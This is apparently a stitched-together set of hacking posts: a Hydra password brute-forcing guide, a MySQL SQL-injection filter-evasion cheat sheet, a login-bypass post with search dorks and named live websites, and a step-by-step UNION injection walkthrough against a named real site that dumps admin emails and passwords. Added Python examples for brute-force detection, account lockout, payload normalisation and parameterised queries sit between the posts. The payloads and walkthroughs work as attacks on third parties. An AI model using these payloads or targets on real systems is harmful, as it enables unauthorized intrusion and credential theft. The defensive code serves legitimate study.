Brute Force Password Cracking and HACKING

One of the most important skills used in hacking and penetration testing is the ability to crack user passwords and gain access to system and network resources. One of the most common techniques is known as brute force password cracking. Using tools such as Hydra, you can run large lists of possible passwords against various network security protocols until the correct password is discovered.
The length of time a brute force password attack takes depends on the processing speed of your computer, your Internet connection speed (and any proxy servers you are relying on for anonymity), and some of the security features that may or may not be installed on the target system. The Whitehat Hacking and Penetration Testing tutorial provides a solid overview of password cracking techniques.
Although there are quite a few password cracking utilities available, Hydra is renowned as one of the best ones and is relied on by hackers and security experts alike as a way to test the strength of user passwords and overall network integrity.
What Protocols Does Hydra Work With?

Hydra is a very versatile penetration testing tool that has been successfully used with most modern network security protocols. Some examples include:
Cisco
Cisco-enable
HTTPS-form-get
MySQL
SSH2
SIP
FTP
Oracle-listener
MSSQL
IMAP
This is a condensed list of some common protocols that Hydra has been successfully used against in penetration testing and malicious hacking exploits but there are many others as well.
How Does Hydra Work?

In order to understand how Hydra works, you first must understand how brute force hacking works. As previously mentioned, Hydra takes a large list of possible passwords (usually in the millions) and systematically attempts to use these passwords to gain entry. Many of the common passwords that are included with Hydra are passwords that are known to be used by non-IT-savvy users, such as password1, secretpassword, etc.
To maximize the effectiveness of a brute force password attack, a good hacker will also incorporate elements of social engineering into a custom password list that specifically targets users within an organization. Social media sites such as Facebook have made social engineering extremely easy as many people use loved ones, children’s names, street addresses, and favorite football teams as their passwords. By linking employees to a specific organization and then looking for social media clues, a hacker can usually build a sturdy password list with a much higher success ratio. You can learn more about social engineering techniques in Hacking School.
Hydra was actually developed for penetration testing, although it has become very popular in the hacking underworld. Regardless of which way you plan to use Hydra, it’s worth noting the recommendations set forth by the Hydra developers.
Make your network as secure as possible.
Set up a test network.
Set up a test server.
Configure services.
Configure the ACL.
Choose good passwords.
Use SSL.
Use cryptography.
Use an IDS.
Throw Hydra against these security measures and try to crack the login commands.
These recommendations are designed to help penetration testers set up a secure environment that is unlikely to be breached by a Hydra attack. The reality is that many networks are set up by amateurs and there is little to no security.
In most professionally configured networks, there are a few security components that render Hydra practically useless and you will probably fail at your attempts to crack passwords and could possibly be charged with a crime for your actions.
Some of these security measures include:
Disabling or blocking access to accounts after a predetermined number of failed authentication attempts has been reached. If this has been configured on a network, chances are it will only allow 3 – 5 attempts before locking down the account. The likelihood that Hydra will guess the correct password in this many attempts is slim to none. In fact, you'd be more likely to win the Powerball.
Many companies have also gone to a multifactor or double opt-in authentication method for users. This means that in addition to a password, a security question has to be answered correctly for access. At this time, Hydra is not set up to crack multifactor authentication.
Installing Hydra

Hydra is a Linux-based tool that can be downloaded freely from the proper repository. Open a Linux terminal and enter the following instructions to download and install the latest version of Hydra:
cd /data/src/
wget http://freeworld.thc.org/releases/hydra-5.9-src.tar.gz
tar xzvf hydra-5.9-src.tar.gz
cd hydra-5.9-src/
./configure
make
sudo make install
Now that Hydra is properly installed on your machine, you’re ready to launch attacks on unsuspecting systems. Although in theory this password cracking utility can work on any network that is not properly secured, some of your best targets are going to be routers that support SSH and Web servers using FTP. Advanced Penetration Testing breaks down likely targets and specific attacks that are effective for each.
If you can gain access to a router via SSH, you can change administrative settings at the root level and then log into the network wirelessly for complete access to network resources. Cracking the FTP password on a Web server provides similar results and can dig up some interesting information or be used to deface websites hosted on the Web server by modifying existing HTML and image files contained within the website hierarchy. Introduction to Ethical Hacking and Web Application Security details common security practices and ways to bypass them using Hydra and other tools.
Using Hydra as a password cracker is not an invincible solution. Rather, you should think of Hydra as just another tool in your hacker's toolbox that can be used when appropriate to gain access to improperly secured network resources.
As a final note, it is illegal to access a network that does not belong to you without permission from the network administrators. If you are using Hydra as a professional penetration tester, you have nothing to worry about. If you are trying to gain unauthorized access to networks in your spare time, you could very well have the police knocking at your door in no time.
Remember – with great power comes great responsibility.
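The post lists account lockout after 3 – 5 failed attempts as the measure that makes Hydra practically useless. The following is an added example, not code from the post or from the Hydra project: it parses sshd-style auth log lines (constructed for the example, with documentation-range addresses), flags a source that produces the burst of failures a password-list run generates, reports any success that followed the burst, and implements the per-account lockout as a small policy object. All function and class names (`parse`, `brute_force_sources`, `suspicious_successes`, `LockoutPolicy`) are my own.

```python
"""Detect a password-list burst in sshd auth logs and apply a lockout policy.
Added example; the log excerpt, host name and addresses are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed excerpt: five failures in three seconds from one source followed
# by a success (a guess landed), then one ordinary typo from another user.
SAMPLE_LOG = """\
Mar  1 10:00:01 bastion sshd[4101]: Failed password for admin from 203.0.113.5 port 40001 ssh2
Mar  1 10:00:02 bastion sshd[4102]: Failed password for admin from 203.0.113.5 port 40002 ssh2
Mar  1 10:00:02 bastion sshd[4103]: Failed password for invalid user test from 203.0.113.5 port 40003 ssh2
Mar  1 10:00:03 bastion sshd[4104]: Failed password for admin from 203.0.113.5 port 40004 ssh2
Mar  1 10:00:03 bastion sshd[4105]: Failed password for admin from 203.0.113.5 port 40005 ssh2
Mar  1 10:00:04 bastion sshd[4106]: Accepted password for admin from 203.0.113.5 port 40006 ssh2
Mar  1 10:05:00 bastion sshd[4107]: Failed password for alice from 198.51.100.7 port 50001 ssh2
Mar  1 10:07:00 bastion sshd[4108]: Accepted password for alice from 198.51.100.7 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+(?:\.\d+){3})"
)


def parse(log, year=2024):
    """Return (timestamp, failed, user, source) tuples; syslog lines carry no year."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group("result") == "Failed", m.group("user"), m.group("src")))
    return events


def brute_force_sources(events, threshold=5, window=timedelta(minutes=1)):
    """Map source -> total failures for sources with >= threshold failures inside one window."""
    failures = defaultdict(list)
    for ts, failed, _user, src in events:
        if failed:
            failures[src].append(ts)
    flagged = {}
    for src, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over failure timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[src] = len(times)
                break
    return flagged


def suspicious_successes(events, flagged):
    """(user, source) pairs that logged in successfully from a flagged source."""
    return [(user, src) for _ts, failed, user, src in events if not failed and src in flagged]


class LockoutPolicy:
    """Lock an account after max_attempts consecutive failures (the post's 3-5 range)."""

    def __init__(self, max_attempts=5):
        self.max_attempts = max_attempts
        self.failures = defaultdict(int)
        self.locked = set()

    def attempt(self, user, password_ok):
        if user in self.locked:
            return "locked"          # even a correct password is refused once locked
        if password_ok:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.max_attempts:
            self.locked.add(user)
            return "locked"
        return "denied"


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    flagged = brute_force_sources(events)
    print("flagged sources:", flagged)
    print("successes from flagged sources:", suspicious_successes(events, flagged))
```

With a lockout in place the fifth guess in the excerpt would have returned "locked" rather than being evaluated, which is why the detection and the policy belong together: the log rule tells you a list is being run, the policy caps how far it can get.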
SQLi filter evasion cheat sheet (MySQL)

This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheat sheet. More detailed explanation can be found in the slides or in the talk (video should come online in a few weeks).

Basic filter
Comments
' or 1=1#
' or 1=1-- -
' or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or-- -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
Prefixes
+ - ~ !
' or --+2=- -!!!'2
Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#
Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'
Strings without quotes
'abc' = 0x616263
Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
Typecasting
' or true = '1 # or 1=1
' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
' or '1 # or true
Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users
Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users
Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter
General function filtering
ascii (97)
load_file/*foo*/(0x616263)
Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\
Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))
Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)
Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))
Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))
String length
length()
bit_length()
char_length()
octet_length()
bit_count()
String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')
Keyword filter
Connected keyword filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)....
0'union all select all`table_name`foo from`information_schema`. `tables`
OR, AND
'||1='1
'&&1='1
'='
'-'
OR, AND, UNION
' and (select pass from users limit 1)='secret
OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a
OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id = 1)='a
OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()#
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#
Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)
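The comment, whitespace and keyword-splitting entries in the sheet above all exploit the same gap: a filter inspects the raw request while MySQL sees the decoded, comment-stripped token stream. The following is an added example, not code from the post or from the PHPIDS project: a small normaliser that applies the same rewrites the MySQL parser effectively applies (percent-decoding, `/*!NNNNN ... */` body kept, plain comments and every whitespace variant collapsed, parentheses treated as separators) before a handful of coarse signatures are matched. The inputs are the sheet's own payloads plus constructed benign query strings; `normalize`, `scan` and the `SIGNATURES` names are mine.

```python
"""Normalise a request value the way the MySQL parser would see it, then match
coarse SQLi signatures.  Added example; signature names are my own."""
import re
from urllib.parse import unquote_plus

SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "boolean_tautology": re.compile(r"(\bor\b|\band\b|\|\||&&).*(=|\blike\b)"),
    "schema_or_file_access": re.compile(r"information_schema|load_file|into (out|dump)file"),
}


def normalize(raw):
    """Decode and canonicalise so the sheet's spacing/comment tricks collapse."""
    # Decode as the web server does: %a0 -> NBSP, %09 -> tab, '+' -> space.
    s = unquote_plus(raw, encoding="latin-1")
    # /*!50000or*/ is executed by MySQL at or above that version: keep its body.
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary /* ... */ comments are whitespace to the parser.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # Parentheses separate tokens exactly as spaces do in the sheet's payloads.
    s = re.sub(r"([()])", r" \1 ", s)
    # Every whitespace alternative (tab, VT, FF, CR, NBSP, ...) becomes one space.
    s = re.sub(r"[\s\x0b\xa0]+", " ", s)
    return s.strip().lower()


def scan(raw):
    """Names of the signatures matched by the normalised form of raw."""
    text = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


if __name__ == "__main__":
    samples = [
        "'or+(1)sounds/**/like\"1\"--%a0-",              # from the Whitespaces entry
        "0%a0union%a0select%09group_concat(table_name)",  # from Connected keyword filtering
        "' /*!50000or*/1='1",                             # from Comments
        "interview_id=2021",                              # constructed benign value
        "'=''",                                           # from Authentication bypass '='
    ]
    for raw in samples:
        print(f"{raw!r:50} -> {normalize(raw)!r:45} {scan(raw)}")
```

The last sample is the point: the `'='` and `'-'` bypasses contain no keyword at all, so no amount of normalisation lets a signature see them, and the `boolean_tautology` pattern will also fire on benign text such as `q=rock+and+roll&page=2`. Normalising before matching closes the entries in the sheet that rely on encoding; it does not turn a blacklist into a control, which is why prepared statements with bound parameters remain the fix.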
Simple sql bypass website hacking

SQL Injection Admin Bypass In Urdu

For ASPX, this string is mostly used:

password: 1'or'1'='1

Or for PHP:

password:  1' OR '1'='1

To find websites, use the dorks below:

inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp


Password: admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1 (enter any one of these in the password field)

Then press Enter. You are in the admin panel. Try here:
http://shopping.richardhealey.com/



http://www.amskrupajal.org/AdminLogin.asp


admin = 1'or'1'='1 pass = 1'or'1'='1



http://www.alertfx.com/admin/admin.asp

admin = 1'or'1'='1 pass = 1'or'1'='1

Thanks for visiting

This is only for educational purposes.

How to hack website manual ( Full Guide )


Hello once again, T00L kiT here. Today I am going to start SQL injection. This is the first class, so let's start.

Requirements:

Firefox browser

Hackbar add-on

Vulnerable site

I already have a vulnerable site, like this:

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check whether this website is vulnerable or not: put ' at the end of the URL, like
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

Yes, I got a SQL error, as you can see.

Step 2
=> Find the table numbers using the order by--+- query. For example:

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)



and so on; when we get an error, that means it's the table number, like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  (Error)

That means it has 46 table numbers.

Step 3
=> Go to Union based => Union statement and select INT,INT

Step 4
=> Now enter the table number value and click OK

Step 5
=> After clicking OK you see this; auto-type the numbers 1 to 46, then click Execute to check that it's working

It's working, we didn't get any error :D

Step 6
=> Put the values at the end of the link like this:
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

You can see this: when we put - we got the column number, which is 6

Step 7
=> Now we need the version:
replace the number 6 with this query "version()"



You can see this: we got the SQL version. If you want more information like user name, hostname and database, use these queries:

For version = version()
For database = database()
For user = user()
For host = @@hostname

Step 8
=> Now we need table information, so replace the number 6 with the query "group_concat(table_name)" (without quotes) and at the end of the URL use this query "from information_schema.tables where table_schema=database()--+-" (without quotes), like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_schema.tables where table_schema=database()--+-


You can see this: we got all the table names. We need the admin user name because we want to hack the website :D

Step 9
=> Now replace "database()" with User

Now select user, go to "sqli basics", select "char()", then paste "user" and click OK, like

And replace table with columns like this:
For columns
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
Now click Execute

Step 10
Now we need the admin email id and password, so use this query:

replace column_name with the data we need; ",0x3a," is used when we need more than one column, and at the end of the URL type the table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-


You can see this: we got all the admin emails and passwords ;) :D

I hope you like this tutorial.

Thanks for visiting

This is only for educational purposes.
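Both walkthroughs above (the admin-login bypass strings and the `interview_id` injection) work only because the request value is pasted into the SQL text. The following is an added example, not code from any of the posts: it runs the page's own payloads against a query built by string concatenation, then against a fixed version that validates the id as a plain integer and binds every value as a parameter. The database is in-memory SQLite with constructed rows; SQLite accepts the `--` comment and the `'1'='1'` tautology the same way MySQL does, so the behaviour matches the tutorials. The functions (`login_vulnerable`, `login_fixed`, `transcript_vulnerable`, `transcript_fixed`, `parse_id`) and table layout are my own.

```python
"""The page's bypass payloads against a concatenated query and against a
parameterised one.  Added example; tables, rows and names are constructed."""
import re
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table users(name text, pass text);
        insert into users values('admin', 'constructed-secret');
        create table transcripts(interview_id integer, title text, body text);
        insert into transcripts values(2021, 'Interview 2021', 'constructed body');
    """)
    return conn


# ---- vulnerable: request values pasted straight into the SQL text -------------
def login_vulnerable(conn, name, password):
    sql = f"select name from users where name = '{name}' and pass = '{password}'"
    return conn.execute(sql).fetchone() is not None


def transcript_vulnerable(conn, raw_id):
    sql = f"select interview_id, title, body from transcripts where interview_id = {raw_id}"
    return conn.execute(sql).fetchall()


# ---- fixed: strict input type plus bound parameters ----------------------------
def parse_id(raw_id):
    """Accept only a short decimal integer; "2021'" and "-2021 union ..." never reach SQL."""
    if not re.fullmatch(r"\d{1,10}", raw_id):
        raise ValueError(f"invalid interview_id: {raw_id!r}")
    return int(raw_id)


def login_fixed(conn, name, password):
    # The driver sends the values separately; quotes and '--' inside them are data.
    sql = "select name from users where name = ? and pass = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def transcript_fixed(conn, raw_id):
    sql = "select interview_id, title, body from transcripts where interview_id = ?"
    return conn.execute(sql, (parse_id(raw_id),)).fetchall()


def outcome(fn, *args):
    """Run a handler and return its result, or the exception class name it raised."""
    try:
        return fn(*args)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    # Payloads taken from the posts above; "nobody" and "wrong" are constructed.
    for name, password in [("nobody", "1'or'1'='1"), ("admin'--", "wrong")]:
        print(f"login {name!r}/{password!r}: vulnerable={login_vulnerable(db, name, password)}"
              f" fixed={login_fixed(db, name, password)}")
    for raw_id in ["2021", "2021'", "-2021 union all select 1,2,3"]:
        print(f"id {raw_id!r}: vulnerable={outcome(transcript_vulnerable, db, raw_id)!r}"
              f" fixed={outcome(transcript_fixed, db, raw_id)!r}")
```

The stray quote that produced the "SQL error" in step 1 surfaces in the vulnerable handler as `OperationalError` from the database, whereas the fixed handler rejects it with `ValueError` before any query is built; the difference is where the failure is caught, and only the second keeps attacker text out of the parser entirely.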